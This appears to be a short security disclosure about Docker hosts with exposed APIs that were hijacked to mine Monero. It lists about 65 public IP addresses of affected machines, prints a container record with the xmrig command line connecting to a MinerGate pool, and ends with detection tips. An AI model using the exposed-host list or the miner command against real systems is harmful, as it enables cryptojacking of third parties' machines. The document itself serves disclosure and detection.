All of the following IPs have the Docker API exposed and have been hijacked to mine Monero (XMR):
101.132.125.134
101.251.243.178
101.255.124.125
101.89.134.211
110.87.27.14
114.116.95.37
117.68.155.0
118.24.67.166
119.123.179.148
119.28.84.69
119.29.25.238
120.55.60.63
120.78.161.231
122.112.211.221
122.130.156.202
122.130.162.88
130.61.37.213
13.126.251.47
13.127.225.86
132.232.136.141
132.232.89.207
138.197.178.7
142.44.136.43
142.93.58.171
159.89.214.243
18.191.227.117
18.216.162.54
18.219.135.89
182.61.18.126
193.112.82.34
198.181.44.229
206.189.172.84
34.219.234.223
34.241.123.235
34.241.26.75
34.243.229.106
35.196.240.112
36.111.35.106
37.123.179.67
40.113.227.30
40.85.221.142
45.115.236.2
45.79.90.143
46.238.43.38
49.4.88.169
52.221.217.38
52.221.254.168
52.55.245.50
52.66.50.254
52.76.241.217
52.83.226.113
52.83.231.122
52.83.255.247
52.87.113.76
54.145.128.254
54.175.91.189
54.183.234.49
54.191.252.227
54.200.143.122
54.202.26.218
54.223.241.195
54.66.165.97
66.226.76.221
68.168.131.140
81.226.150.217
All appear to have the following image and command line (see the "Image" and "Command" fields):
{
"Status": "Up 20 hours",
"Created": 1536506330,
"Image": "tmpdocker/xmr",
"Labels": {},
"NetworkSettings": {
"Networks": {
"bridge": {
"NetworkID": "REDACTED",
"MacAddress": "REDACTED",
"GlobalIPv6PrefixLen": 0,
"Links": null,
"GlobalIPv6Address": "",
"IPv6Gateway": "",
"DriverOpts": null,
"IPAMConfig": null,
"EndpointID": "REDACTED",
"IPPrefixLen": 16,
"IPAddress": "172.17.0.3",
"Gateway": "172.17.0.1",
"Aliases": null
}
}
},
"HostConfig": {
"NetworkMode": "default"
},
"ImageID": "sha256:96f015c729696b0fe40d4c12710990be310543c51a77f7e4150edc0a6bd3158e",
"State": "running",
"Command": "./xmrig -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x --safe -k",
"Names": [
"/clever_lovelace"
],
"Mounts": [],
"Id": "c0c4149d65341041d8c4b6577b24669e4bf74dcb0e327d12157ad5564ee2e792",
"Ports": []
},
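All appear to use the same ProtonMail email address as the mining-pool username (the -u argument in the command line above):
[email protected] connecting to stratum+tcp://xmr.pool.minergate.com:45700
To check a host for this activity, look for a container running the tmpdocker/xmr image or for outbound connections to xmr.pool.minergate.com on port 45700.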